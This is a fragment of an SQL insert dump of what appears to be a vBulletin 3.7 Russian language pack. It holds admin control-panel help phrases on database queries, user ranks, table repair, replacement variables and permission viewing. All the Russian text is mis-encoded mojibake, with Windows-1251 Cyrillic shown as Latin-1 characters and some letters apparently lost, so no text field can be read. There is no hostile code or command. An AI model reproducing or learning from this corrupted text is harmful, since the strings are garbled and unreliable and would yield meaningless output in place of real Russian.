(23774, -1, 'queries_modify_autoquery_text', 'cphelptext', 'Ãòî ïðåäóñòà ÃîâëåÃÃûå çà ïðîñû äëÿ óïðà âëåÃèÿ Ãà ñòðîéêà ìè ïîëüçîâà òåëåé. Âûáåðèòå çà ïðîñ, êîòîðûé âû æåëà åòå çà ïóñòèòü, è Ãà æìèòå êÃîïêó \"Ãðîäîëæèòü\", ÷òîáû âûïîëÃèòü åãî.', 'vbulletin', '', 0, ''),
(23775, -1, 'queries_modify_autoquery_title', 'cphelptext', 'Àâòîìà òè÷åñêèé çà ïðîñ', 'vbulletin', '', 0, ''),
(23776, -1, 'queries_modify_query_text', 'cphelptext', 'Çäåñü âû ìîæåòå ñà ìîñòîÿòåëüÃî ââåñòè çà ïðîñ äëÿ çà ïóñêà . Òîëüêî îäèà çà ïðîñ ìîæåò áûòü âûïîëÃåà çà ðà ç. Ãîñëå âûïîëÃÃ¥Ãèÿ çà ïðîñà âîññòà ÃîâëåÃèå ÃåâîçìîæÃî.', 'vbulletin', '', 0, ''),
(23777, -1, 'queries_modify_query_title', 'cphelptext', 'Ãó÷Ãîé çà ïðîñ', 'vbulletin', '', 0, ''),
(23778, -1, 'queries_modify_perpage_text', 'cphelptext', 'Çà ïðîñû âîçâðà ùà þò ðåçóëüòà òû ïîñëå âûïîëÃÃ¥Ãèÿ. Çäåñü âû ìîæåòå óêà çà òü ñêîëüêî ðåçóëüòà òîâ áóäåò âûâîäèòüñÿ Ãà îäÃîé ñòðà Ãèöå.', 'vbulletin', '', 0, ''),
(23779, -1, 'queries_modify_perpage_title', 'cphelptext', 'Ãåçóëüòà òîâ Ãà ñòðà Ãèöó', 'vbulletin', '', 0, ''),
(23780, -1, 'ranks_text', 'cphelptext', 'Çâà Ãèÿ ïîëüçîâà òåëåé: \r\nÇâà Ãèÿ ïîëüçîâà òåëåé - çâà Ãèÿ, ñ ðà çëè÷èÿìè, îñÃîâà ÃÃûìè Ãà êîëè÷åñòâå ñîîáùåÃèé è ãðóïïå ïîëüçîâà òåëåé, îòîáðà æà åìûå âîçëå èì¸à ïîëüçîâà òåëåé â ñîîáùåÃèÿõ. Çâà Ãèÿ ïîëüçîâà òåëåé ðà áîòà þò î÷åÃü ñõîäÃî ñî ñòà òóñà ìè ïîëüçîâà òåëåé. Èõ ãëà âÃîå îòëè÷èå ñîñòîèò â òîì, ÷òî ñòà òóñû ïîëüçîâà òåëåé äåéñòâóþò äëÿ âñåõ ãðóïï ïîëüçîâà òåëåé, à çâà Ãèÿ ìîãóò áûòü ñîçäà Ãû ñïåöèà ëüÃî äëÿ îòäåëüÃûõ ãðóïï ïîëüçîâà òåëåé. Ãîýòîìó âû ìîæåòå ñäåëà òü ðà çëè÷Ãûå ïîêà çà òåëè äëÿ äîñòèæåÃèÿ çâà Ãèÿ äëÿ ðà çÃûõ ãðóïï ïîëüçîâà òåëåé. Çâà Ãèÿ ïîëüçîâà òåëåé îòîáðà æà þòñÿ ðÿäîì ñ èõ èìåÃà ìè â ñîîáùåÃèÿõ.', 'vbulletin', '', 0, ''),
(23781, -1, 'ranks_title', 'cphelptext', 'ÃŽ çâà Ãèÿõ ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23782, -1, 'ranks_add_text', 'cphelptext', 'Çäåñü âû ìîæåòå äîáà âèòü Ãîâîå çâà Ãèå ïîëüçîâà òåëåé. Ñìîòðèòå ñïðà âî÷Ãûå ñòà òüè Ãèæå, åñëè ó âà ñ åñòü âîïðîñû Ãà ýòó òåìó.', 'vbulletin', '', 0, ''),
(23783, -1, 'ranks_add_title', 'cphelptext', 'Äîáà âèòü Ãîâîå ïîëüçîâà òåëüñêîå çâà Ãèå', 'vbulletin', '', 0, ''),
(23784, -1, 'ranks_add_edit_ranklevel_text', 'cphelptext', 'Ãòî êîëè÷åñòâî ðà ç, êîãäà áóäåò ïîâòîðÿòüñÿ èçîáðà æåÃèå èëè òåêñò çâà Ãèÿ ïðè îòîáðà æåÃèè ó èìåÃè ïîëüçîâà òåëÿ â ñîîáùåÃèÿõ. \r\n\r\nÃà ïðèìåð, âû óêà çà ëè òåêñò çâà Ãèÿ \"Êà ïèòà à \" è óñòà Ãîâèëè çäåñü 2, òî çâà Ãèå ïîëüçîâà òåëÿ áóäåò îòîáðà æà òüñÿ êà ê \"Êà ïèòà à Êà ïèòà à \".', 'vbulletin', '', 0, ''),
(23785, -1, 'ranks_add_edit_ranklevel_title', 'cphelptext', 'Êîëè÷åñòâî ïîâòîðåÃèé çâà Ãèÿ', 'vbulletin', '', 0, ''),
(23786, -1, 'ranks_add_edit_minposts_text', 'cphelptext', 'Ãòî ìèÃèìà ëüÃîå êîëè÷åñòâî ñîîáùåÃèé, òðåáóåìîå äëÿ òîãî, ÷òîáû ïîëüçîâà òåëþ áûë ïðèñâîåÃî ýòî çâà Ãèå. Êîãäà ïîëüçîâà òåëü èç óêà çà ÃÃîé ãðóïïû ïîëüçîâà òåëåé Ãà áèðà åò Ãåîáõîäèìîå ÷èñëî ñîîáùåÃèé, îà ïîëó÷à åò ýòî çâà Ãèå.', 'vbulletin', '', 0, ''),
(23787, -1, 'ranks_add_edit_minposts_title', 'cphelptext', 'ÌèÃèìà ëüÃîå ÷èñëî ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(23788, -1, 'ranks_add_edit_usergroupid_text', 'cphelptext', 'Ãòî ãðóïïà ïîëüçîâà òåëåé, ê êîòîðîé ïðèìåÃèìî äà ÃÃîå çâà Ãèå. Ãîëüçîâà òåëè, ê êîòîðûì îÃî áóäåò ïðèìåÃèìî, çà âèñÿò îò ïà ðà ìåòðà \"Òèï îòîáðà æåÃèÿ\". Åñëè âû âûáåðèòå \"Âñåãäà \", òî âñå ïîëüçîâà òåëè ýòîé ãðóïïû â åãî ãëà âÃîé èëè äîïîëÃèòåëüÃûõ ãðóïïà õ áóäóò ïîëó÷à òü ýòî çâà Ãèå. Åñëè âû âûáåðèòå \"Åñëè îòîáðà æà åìà ÿ ãðóïïà = Ãòà ãðóïïà \", òî òîëüêî ïîëüçîâà òåëè, êîòîðûå îïðåäåëÿþò ñåáÿ ÷ëåÃà ìè äà ÃÃîé ãðóïïû ïîëüçîâà òåëåé, áóäóò ïîëó÷à òü ýòî çâà Ãèå. \r\n \r\nÂûáåðèòå \"Âñå ãðóïïû ïîëüçîâà òåëåé\", ÷òîáû ïðèñâà èâà òü äà ÃÃîå çâà Ãèå âñåì ïîëüçîâà òåëÿì âÃÃ¥ çà âèñèìîñòè îò èõ ãðóïïû.', 'vbulletin', '', 0, ''),
(23789, -1, 'ranks_add_edit_usergroupid_title', 'cphelptext', 'Ãðóïïà ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23790, -1, 'ranks_add_edit_rankimg_text', 'cphelptext', 'Ââåäèòå ïóòü ê ôà éëó ñ èçîáðà æåÃèåì äëÿ ýòîãî çâà Ãèÿ. Ãòîò ïóòü äîëæåà áûòü îòÃîñèòåëüÃûì âà øåé ãëà âÃîé äèðåêòîðèè. Ãà ïðèìåð, åñëè èçîáðà æåÃèå äëÿ âà øåãî çâà Ãèÿ Ãà çûâà åòñÿ zvaine.gif, è âû çà ãðóçèëè å¸ â äèðåêòîðèþ images, Ãà õîäÿùóþñÿ â âà øåé äèðåêòîðèè ôîðóìà , òî âà ì ñëåäóåò ââåñòè: images/zvanie.gif \r\n\r\nÊà ê à ëüòåðÃà òèâó, âû ìîæåòå ïðîïóñòèòü ýòî ïîëå è çà ïîëÃèòü ñëåäóþùåå, ñ òåêñòîì çâà Ãèÿ.', 'vbulletin', '', 0, ''),
(23791, -1, 'ranks_add_edit_rankimg_title', 'cphelptext', 'Ãóòü ê ôà éëó ñî çâà Ãèåì ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(23792, -1, 'ranks_add_edit_rankhtml_text', 'cphelptext', 'Åñëè âû æåëà åòå âìåñòî èçîáðà æåÃèÿ îòîáðà æà òü òåêñò äëÿ ýòîãî çâà Ãèÿ, òî ïðîïóñòèòå ïðåäûäóùåå ïîëå è çà ïîëÃèòå ýòî ïîëå. Çäåñü âû ìîæåòå èñïîëüçîâà òü HTML êîä. \r\n\r\nÂîò Ãåêîòîðûå HTML òåãè, êîòîðûå âû, âåðîÿòÃî, ïîæåëà åòå âêëþ÷èòü: \r\n\r\n<b>çâà Ãèå</b> = çâà Ãèå \r\n<i>çâà Ãèå</i> = çâà Ãèå \r\n<u>çâà Ãèå</u> = çâà Ãèå \r\n<font color=\"red\">çâà Ãèå</font> = çâà Ãèå \r\n<font size=\"4\">çâà Ãèå</font> = çâà Ãèå ', 'vbulletin', 'zCarot', 1205431156, '3.7.0 Release Candidate 1'),
(23793, -1, 'ranks_add_edit_rankhtml_title', 'cphelptext', 'Òåêñò çâà Ãèÿ', 'vbulletin', '', 0, ''),
(23794, -1, 'ranks_add_edit_stack_text', 'cphelptext', 'Åñëè \"Äà \", òî îÃî áóäåò Ãà õîäèòüñÿ Ãà îòäåëüÃîé ñòðîêå ïî ñðà âÃÃ¥Ãèþ ñ äðóãèìè çâà Ãèÿìè.  ïðîòèâÃîì ñëó÷à å îÃî áóäåò ñëåâà îò äðóãèõ çâà Ãèé.  ïðà âèëà õ HTML ýòà îïöèÿ îïðåäåëÿåò, áóäåò èëè Ãåò âñòà âëåà ïåðåä ýòèì çâà Ãèåì òåã <br />.', 'vbulletin', 'zCarot', 1205942440, '3.7.0 Release Candidate 1'),
(23795, -1, 'ranks_add_edit_stack_title', 'cphelptext', 'ÃåðåÃåñòè çâà Ãèå', 'vbulletin', '', 0, ''),
(23796, -1, 'ranks_add_edit_display_text', 'cphelptext', 'Âñåãäà : ýòî çâà Ãèå áóäåò îòîáðà æà òüñÿ, åñëè ó÷à ñòÃèê ÿâëÿåòñÿ ÷ëåÃîì óêà çà ÃÃîé ãðóïïû ïîëüçîâà òåëåé. \r\nÅñëè îòîáðà æà òü ãðóïïó, òî ýòó ãðóïïó : ýòî çâà Ãèå áóäåò îòîáðà æà òüñÿ, åñëè îòîáðà æà åìà ÿ ãðóïïà ïîëüçîâà òåëÿ ÿâëÿåòñÿ ãðóïïîé ïîëüçîâà òåëåé, èñïîëüçóþùèõ ýòî çâà Ãèå.', 'vbulletin', '', 0, ''),
(23797, -1, 'ranks_add_edit_display_title', 'cphelptext', 'Òèï îòîáðà æåÃèÿ', 'vbulletin', '', 0, ''),
(23798, -1, 'ranks_edit_text', 'cphelptext', 'Çäåñü âû ìîæåòå îòðåäà êòèðîâà òü çâà Ãèÿ ïîëüçîâà òåëåé. Ñìîòðèòå ñïðà âî÷Ãûå ñòà òüè Ãèæå, åñëè ó âà ñ åñòü âîïðîñû Ãà ýòó òåìó', 'vbulletin', '', 0, ''),
(23799, -1, 'ranks_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå çâà Ãèé ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23800, -1, 'ranks_modify_text', 'cphelptext', 'Ãòî óïðà âëåÃèå çâà Ãèÿìè ïîëüçîâà òåëåé. Çäåñü âû ìîæåòå óïðà âëÿòü çâà Ãèÿìè, îñÃîâà ÃÃûìè Ãà ñ÷¸ò÷èêå ñîîáùåÃèé äëÿ îäÃîé èëè âñåõ ãðóïï ïîëüçîâà òåëåé. Çâà Ãèÿìè ìîãóò ñëóæèòü êà ê èçîáðà æåÃèÿ, òà ê è òåêñò (HTML äîïóñêà åòñÿ). \r\n\r\nÃèæå Ãà õîäèòñÿ ñïèñîê âñåõ âà øèõ äîïóñòèìûõ çâà Ãèé (åñëè åñòü). Çâà Ãèÿ ðà ñïðåäåëåÃû ïî ãðóïïà ì ïîëüçîâà òåëåé, ê êîòîðûì îÃè ïðèìåÃèìû. ÊîëîÃêà \"Çâà Ãèå ïîëüçîâà òåëåé\" îòîáðà æà åò èçîáðà æåÃèå èëè òåêñò, êîòîðûå îçÃà ÷à þò, ÷òî ïîëüçîâà òåëü ïîëó÷èë ñîîòâåòñòâóþùèé çâà Ãèå. ÊîëîÃêà \"ìèÃèìà ëüÃîå ÷èñëî ñîîáùåÃèé\" óêà çûâà åò Ãà êîëè÷åñòâî ñîîáùåÃèé, Ãåîáõîäèìîå äëÿ ïîëó÷åÃèÿ ñîîòâåòñòâóþùåãî çâà Ãèÿ. \r\n\r\nÃà æìèòå Ãà ññûëêó \"Ãåäà êòèðîâà òü\" ñïðà âà îò çâà Ãèÿ, ÷òîáû èçìåÃèòü ãðóïïó ïîëüçîâà òåëåé, ìèÃèìà ëüÃîå ÷èñëî ñîîáùåÃèé è èçîáðà æåÃèå/òåêñò çâà Ãèÿ. Ãà æìèòå Ãà ññûëêó \"Óäà ëèòü\", ÷òîáû ïîëÃîñòüþ óäà ëèòü çâà Ãèå.', 'vbulletin', '', 0, ''),
(23801, -1, 'ranks_modify_title', 'cphelptext', 'Óïðà âëåÃèå çâà Ãèÿìè ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23802, -1, 'ranks_remove_text', 'cphelptext', 'Ãòî ïîäòâåðæäåÃèå òîãî, ÷òî âû æåëà åòå óäà ëèòü ýòî çâà Ãèå. Ãà æìèòå Ãà êÃîïêó \"Äà \", ÷òîáû óäà ëèòü åãî.', 'vbulletin', '', 0, ''),
(23803, -1, 'ranks_remove_title', 'cphelptext', 'Óäà ëåÃèå çâà Ãèÿ', 'vbulletin', '', 0, ''),
(23804, -1, 'repair_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÃåçåðâÃîå êîïèðîâà Ãèå áà çû äà ÃÃûõ \r\nÂîññòà ÃîâëåÃèå/îïòèìèçà öèÿ \r\nÎáÃîâëåÃèå ñ÷¸ò÷èêîâ \r\nÄèà ãÃîñòèêà \r\nÂûïîëÃÃ¥Ãèå SQL çà ïðîñà \r\n\r\nÂîññòà ÃîâëåÃèå/îïòèìèçà öèÿ: \r\nÃòîò ñêðèïò ìîæåò áûòü èñïîëüçîâà à äëÿ âîññòà ÃîâëåÃèÿ/îïòèìèçà öèè âà øåé áà çû äà ÃÃûõ. Åñëè âà øè îøèáêè áà çû äà ÃÃûõ âûçâà Ãû ïîâðåæäåÃèåì òà áëèö, òî ýòîò ñêðèïò, âîçìîæÃî, èñïðà âèò èõ. Êà ê à ëüòåðÃà òèâó, âû ìîæåòå èñïîëüçîâà òü äëÿ âîññòà ÃîâëåÃèÿ âà øåé áà çû äà ÃÃûõ âûïîëÃÃ¥Ãèå çà ïðîñà REPAIR TABLE â êîìà ÃäÃîé ñòðîêå mysql ÷åðåç telnet / SSH ñîåäèÃÃ¥Ãèå ê âà øåìó ñåðâåðó (åñëè ó âà ñ åñòü äîñòóï). \r\n\r\nÂû ìîæåòå òà êæå èñïîëüçîâà òü ýòîò ñêðèïò äëÿ îïòèìèçà öèè âà øèõ òà áëèö. Ñëåäóåò îïòèìèçèðîâà òü òà áëèöû â òîì ñëó÷à å, åñëè âû Ãåäà âÃî óäà ëèëè áîëüøîå êîëè÷åñòâî òåì, ñîîáùåÃèé, ïîëüçîâà òåëåé è ò.ä.. Îïòèìèçà öèÿ ïîìîæåò âà ì âîññòà Ãîâèòü Ãåèñïîëüçóåìîå ìåñòî, êîòîðîå ìîæåò óâåëè÷èâà òü ðà çìåð âà øåé áà çû äà ÃÃûõ.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(23805, -1, 'repair_title', 'cphelptext', 'ÃŽ âîññòà ÃîâëåÃèè/îïòèìèçà öèè', 'vbulletin', '', 0, ''),
(23806, -1, 'repair_list_text', 'cphelptext', 'Âûáåðèòå òà áëèöû, à çà òåì Ãåîáõîäèìîå äåéñòâèå. Âîññòà Ãîâèòå òà áëèöû, åñëè îÃè áûëè ïîâðåæäåÃû, èëè îïòèìèçèðóéòå äëÿ ïîâûøåÃèÿ áûñòðîäåéñòâèÿ.', 'vbulletin', '', 0, ''),
(23807, -1, 'repair_list_title', 'cphelptext', 'Âîññòà Ãîâèòü/îïòèìèçèðîâà òü òà áëèöû', 'vbulletin', '', 0, ''),
(23808, -1, 'repair_list_optimizetables_text', 'cphelptext', 'Åñëè âû óäà ëèëè çÃà ÷èòåëüÃóþ ÷à ñòü òà áëèö èëè ñäåëà ëè ìÃîãî èçìåÃÃ¥Ãèé ñ òà áëèöà ìè ñ äëèÃîé êîëîÃêè, çà âèñèìîé îò ïåðåìåÃÃîé (òà áëèöû, êîòîðûå èìåþò êîëîÃêè VARCHAR, BLOB èëè TEXT), òî âà ì ñëåäóåò îïòèìèçèðîâà òü âà øó áà çó äà ÃÃûõ. Îïòèìèçà öèÿ ïîìîæåò âà ì âîññòà Ãîâèòü Ãåèñïîëüçóåìîå ìåñòî, êîòîðîå ìîæåò óâåëè÷èâà òü ðà çìåð âà øåé áà çû äà ÃÃûõ.', 'vbulletin', '', 0, ''),
(23809, -1, 'repair_list_optimizetables_title', 'cphelptext', 'Îïòèìèçèðîâà òü òà áëèöû', 'vbulletin', '', 0, ''),
(23810, -1, 'repair_list_repairtables_text', 'cphelptext', 'Âîññòà ÃîâëåÃèå âûáðà ÃÃûõ òà áëèö, åñëè òà ì Ãà éäåÃû îøèáêè.', 'vbulletin', '', 0, ''),
(23811, -1, 'repair_list_repairtables_title', 'cphelptext', 'Âîññòà Ãîâèòü òà áëèöû', 'vbulletin', '', 0, ''),
(23812, -1, 'replacement_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÑòèëè è øà áëîÃû \r\nÎáùèå øà áëîÃû, ïåðåìåÃÃûå ñòèëÿ è CSS \r\nÇà ìåùà åìûå ïåðåìåÃÃûå \r\n\r\nÇà ìåùà åìûå ïåðåìåÃÃûå: \r\nÇà ìåùà åìûå ïåðåìåÃÃûå - îäÃîñòðî÷Ãûå çà ìåÃû äëÿ âà øèõ øà áëîÃîâ, êîòîðûå ÃÃ¥ çà âèñÿò îò ðåãèñòðà . \r\n\r\nÃà ïðèìåð, åñëè âû ñîçäà ëè çà ìåùà åìóþ ïåðåìåÃÃóþ, èñïîëüçóþùóþ ñòðîêó \"ôîðóì\" è ñòðîêó äëÿ çà ìåÃû \"ñà éò\", òî òîãäà ýòà ñòðîêà øà áëîÃà áóäåò çà ìåÃÃ¥Ãà â ñîîòâåòñòâóþùèå ñòðîêè ïðè çà ãðóçêè ôîðóìà : \r\n\r\nÑòðîêà øà áëîÃà : ÎñÃîâà äëÿ ôîðóìà : ôîðóì \r\nÑòðîêà çà ìåÃû: ÎñÃîâà äëÿ ñà éòà : ñà éò \r\n\r\nÑòðîêà øà áëîÃà : ôîÃÓì3 \r\nÑòðîêà çà ìåÃû: ñà éò3 \r\n\r\nÂû ìîæåòå èñïîëüçîâà òü çà ìåùà åìûå ïåðåìåÃÃûå òà ê æå, êà ê è ôîðóì èñïîëüçóåò ïåðåìåÃÃûå ñòèëÿ (ñì. ññûëêó \"Îáùèå øà áëîÃû, ïåðåìåÃÃûå ñòèëÿ è CSS\"). Åñëè âû èñïîëüçóéòå îäèÃà êîâûå ñòðîêè â Ãåñêîëüêèõ øà áëîÃà õ, òî âû ìîæåòå ñîçäà òü çà ìåùà åìûå ïåðåìåÃÃûå äëÿ êà æäîãî. Âû ìîæåòå èñïîëüçîâà òü çà ìåùà åìûå ïåðåìåÃÃûå â øà áëîÃà õ è óêà çà òü èõ çÃà ÷åÃèÿ â óïðà âëåÃèè çà ìåùà åìûìè ïåðåìåÃÃûìè. Åñëè âû æåëà åòå èçìåÃèòü çÃà ÷åÃèå ñòðîêè, òî âà ì ñëåäóåò èçìåÃèòü çà ìåùà åìóþ ïåðåìåÃÃóþ, êîòîðà ÿ èçìåÃèò ñâîå çÃà ÷åÃèå âî âñåõ øà áëîÃà õ, ãäå îÃà èñïîëüçóåòñÿ.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(23813, -1, 'replacement_title', 'cphelptext', 'ÃŽ çà ìåùà åìûõ ïåðåìåÃÃûõ', 'vbulletin', '', 0, ''),
(23814, -1, 'replacement_add_text', 'cphelptext', 'Çäåñü âû ìîæåòå äîáà âèòü Ãîâóþ çà ìåùà åìóþ ïåðåìåÃÃóþ. Çà ìåùà åìûå ïåðåìåÃÃûå ïîëåçÃû äëÿ äðóãîãî ïðåäñòà âëåÃèÿ îáû÷Ãûõ çÃà ÷åÃèé ïåðåìåÃÃûõ â øà áëîÃà õ. Ãà ïðèìåð, ïóòü ê äèðåêòîðèè images èñïîëüçóåòñÿ âî ìÃîãèõ øà áëîÃà õ ôîðóìà , è îà òîæå ÿâëÿåòñÿ çà ìåùà åìîé ïåðåìåÃÃîé. Çà ìåùà åìà ÿ ïåðåìåÃÃà ÿ ñ äèðåêòîðèåé images ìîæåò áûòü îòðåäà êòèðîâà Ãà äëÿ èçìåÃÃ¥Ãèÿ ïóòè ê images â êà æäîì øà áëîÃÃ¥. \r\n\r\nÄëÿ Ãà ÷à ëà âà ì ÃóæÃî âûáðà òü ñòèëü, ê êîòîðîìó áóäåò ïðèìåÃÃ¥Ãà ýòà çà ìåùà åìà ÿ ïåðåìåÃÃà ÿ. Ãîëå \"Òåêñò äëÿ ïîèñêà \" ñîäåðæèò ïåðåìåÃÃóþ, èñïîëüçóåìóþ â øà áëîÃà õ. Ãîëå \"Çà ìåÃèòü òåêñòîì\" ñîäåðæèò çÃà ÷åÃèå, êîòîðîå áóäåò ïîâñþäó çà ìåÃÿòü çà ìåùà åìóþ ïåðåìåÃÃóþ.', 'vbulletin', '', 0, ''),
(23815, -1, 'replacement_add_title', 'cphelptext', 'Äîáà âèòü Ãîâóþ çà ìåùà åìóþ ïåðåìåÃÃóþ', 'vbulletin', '', 0, ''),
(23816, -1, 'replacement_add_dostyleid_text', 'cphelptext', 'Âûáåðèòå ñòèëü, ê êîòîðîìó äîëæÃà ïðèÃà äëåæà òü ýòà çà ìåùà åìà ÿ ïåðåìåÃÃà ÿ.', 'vbulletin', '', 0, ''),
(23817, -1, 'replacement_add_dostyleid_title', 'cphelptext', 'Ñòèëü', 'vbulletin', '', 0, ''),
(23818, -1, 'replacement_add_edit_findtext_text', 'cphelptext', 'Ãòî ïîëå äëÿ ïåðåìåÃÃîé, èñïîëüçóåìîé â øà áëîÃà õ. ÇÃà ÷åÃèå ïîëÿ \"Çà ìåÃèòü òåêñòîì\" áóäåò çà ìåÃÿòü çÃà ÷åÃèå ýòîãî ïîëÿ ïîâñþäó, ãäå îÃî èñïîëüçóåòñÿ.', 'vbulletin', '', 0, ''),
(23819, -1, 'replacement_add_edit_findtext_title', 'cphelptext', 'Ãîèñê òåêñòà ', 'vbulletin', '', 0, ''),
(23820, -1, 'replacement_add_edit_replacetext_text', 'cphelptext', 'Ãòî ïîëå ñîäåðæèò çÃà ÷åÃèå, êîòîðîå áóäåò ïîâñþäó çà ìåÃÿòü çà ìåùà åìóþ ïåðåìåÃÃóþ.', 'vbulletin', '', 0, ''),
(23821, -1, 'replacement_add_edit_replacetext_title', 'cphelptext', 'Çà ìåÃà òåêñòîì', 'vbulletin', '', 0, ''),
(23822, -1, 'replacement_edit_text', 'cphelptext', 'Çäåñü âû ìîæåòå îòðåäà êòèðîâà òü ýòó çà ìåùà åìóþ ïåðåìåÃÃóþ. Çà ìåùà åìûå ïåðåìåÃÃûå ïîëåçÃû äëÿ äðóãîãî ïðåäñòà âëåÃèÿ îáû÷Ãûõ çÃà ÷åÃèé ïåðåìåÃÃûõ â øà áëîÃà õ. Ãà ïðèìåð, ïóòü ê äèðåêòîðèè images èñïîëüçóåòñÿ âî ìÃîãèõ øà áëîÃà õ ôîðóìà è îà òîæå ÿâëÿåòñÿ çà ìåùà åìîé ïåðåìåÃÃîé. Çà ìåùà åìà ÿ ïåðåìåÃÃà ÿ ñ äèðåêòîðèåé images ìîæåò áûòü îòðåäà êòèðîâà Ãà äëÿ èçìåÃÃ¥Ãèÿ ïóòè ê images â êà æäîì øà áëîÃÃ¥. \r\n\r\nÃîëå \"Òåêñò äëÿ ïîèñêà \" ñîäåðæèò ïåðåìåÃÃóþ, èñïîëüçóåìóþ â øà áëîÃà õ. Ãîëå \"Çà ìåÃèòü òåêñòîì\" ñîäåðæèò çÃà ÷åÃèå, êîòîðîå áóäåò ïîâñþäó çà ìåÃÿòü çà ìåùà åìóþ ïåðåìåÃÃóþ.', 'vbulletin', '', 0, ''),
(23823, -1, 'replacement_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå çà ìåùà åìîé ïåðåìåÃÃîé', 'vbulletin', '', 0, ''),
(23824, -1, 'replacement_modify_text', 'cphelptext', 'Ãòà ñòðà Ãèöà îòîáðà æà åò âñå âà øè çà ìåùà åìûå ïåðåìåÃÃûå äëÿ âñåõ ñòèëåé. Çà ìåùà åìûå ïåðåìåÃÃûå ìîãóò áûòü èñïîëüçîâà Ãû â øà áëîÃà õ. Ãðè çà ãðóçêå ñòðà Ãèöû ôîðóìà âñå çà ìåùà åìûå ïåðåìåÃÃûå â øà áëîÃà õ çà ìåÃÿþòñÿ çà ìåùà åìûìè èõ çÃà ÷åÃèÿìè.', 'vbulletin', '', 0, ''),
(23825, -1, 'replacement_modify_title', 'cphelptext', 'Óïðà âëåÃèå çà ìåùà åìûìè ïåðåìåÃÃûìè', 'vbulletin', '', 0, ''),
(23826, -1, 'replacement_remove_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì óäà ëèòü ýòó çà ìåùà åìóþ ïåðåìåÃÃóþ. Ãà æìèòå êÃîïêó \"Äà \" äëÿ óäà ëåÃèÿ. Åñëè ñòèëü èìååò ïîäñòèëè, òî îÃè òà êæå ïîòåðÿþò äîñòóï ê ýòîé çà ìåùà åìîé ïåðåìåÃÃîé, åñëè îÃà áóäåò óäà ëåÃà . Âîññòà ÃîâëåÃèå ÃåâîçìîæÃî!', 'vbulletin', '', 0, ''),
(23827, -1, 'replacement_remove_title', 'cphelptext', 'Óäà ëåÃèå çà ìåùà åìîé ïåðåìåÃÃîé', 'vbulletin', '', 0, ''),
(23828, -1, 'resources_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÃà çäåëû \r\nÃðà âà â ðà çäåëà õ \r\nÌîäåðà òîðû \r\nÃðîñìîòð ïðà â \r\n\r\nÃðîñìîòð ïðà â: \r\nÑèñòåìà ïðà â ôîðóìà î÷åÃü ìîùÃà ÿ è ãèáêà ÿ, Ãî îÃà ìîæåò ïîêà çà òüñÿ î÷åÃü ñëîæÃîé äëÿ ÃåîïûòÃûõ ñ ôîðóìîì. ÈÃîãäà ñëîæÃî ïîÃÿòü, Ãà ñòðîåÃû ëè ïðà âà ïðà âèëüÃî. Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì ïîäòâåðäèòü, ÷òî ïðà âà óñòà ÃîâëåÃû ïðà âèëüÃî äëÿ âñåõ ãðóïï ïîëüçîâà òåëåé â êà æäîì ðà çäåëå. \r\n\r\nÄëÿ äåòà ëüÃîãî îáúÿñÃÃ¥Ãèÿ ãðóïï ïîëüçîâà òåëåé è ïðà â ðà çäåëîâ ñìîòðèòå ñïðà âî÷Ãûå ñòà òüè Ãà òåìó \"Ãðóïïû ïîëüçîâà òåëåé\" .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(23829, -1, 'resources_title', 'cphelptext', 'Î ïðîñìîòðå ïðà â', 'vbulletin', '', 0, ''),
(23830, -1, 'resources_index_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì ïðîñìîòðåòü ïðà âà îïðåäåëåÃÃîãî ðà çäåëà äëÿ ãðóïïû ïîëüçîâà òåëåé. Ãòî ìîæåò áûòü ïîëåçÃûì äëÿ ïîäòâåðæäåÃèÿ ïðà âèëüÃîñòè ïðà â ïðè Ãà ñëåäîâà Ãèè è äðóãèõ ñëîæÃîñòÿõ. \r\n\r\nÄëÿ Ãà ÷à ëà âûáåðèòå ðà çäåë è ãðóïïó ïîëüçîâà òåëåé, ÷üè ïðà âà âû æåëà åòå ïðîñìîòðåòü. Çà òåì îòìåòüòå ïðà âà , êîòîðûå âû æåëà åòå ïðîñìîòðåòü. Ãà æìèòå \"Ãà éòè\" äëÿ ïðîñìîòðà ïðà â.', 'vbulletin', '', 0, ''),
(23831, -1, 'resources_index_title', 'cphelptext', 'Ãîêà çà òü ïðà âà ðà çäåëà ', 'vbulletin', '', 0, ''),
(23832, -1, 'resources_index_forumid_text', 'cphelptext', 'Âûáåðèòå ðà çäåë, â êîòîðîì âû æåëà åòå ïðîñìîòðåòü ïðà âà .', 'vbulletin', '', 0, ''),
(23833, -1, 'resources_index_forumid_title', 'cphelptext', 'Ãà çäåë', 'vbulletin', '', 0, ''),
(23834, -1, 'resources_index_usergroupid_text', 'cphelptext', 'Âûáåðèòå ãðóïïó ïîëüçîâà òåëåé, ÷üè ïðà âà â âûáðà ÃÃîì ðà çäåëå âû æåëà åòå ïðîñìîòðåòü.', 'vbulletin', '', 0, ''),
(23835, -1, 'resources_index_usergroupid_title', 'cphelptext', 'Ãðóïïà ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23836, -1, 'resources_view_text', 'cphelptext', 'Ãèæå Ãà õîäèòñÿ ñïèñîê ïðà â ðà çäåëà äëÿ âûáðà ÃÃûõ ðà çäåëà è ãðóïïû ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(23837, -1, 'resources_view_title', 'cphelptext', 'Ãà çðåøåÃèÿ', 'vbulletin', '', 0, ''),
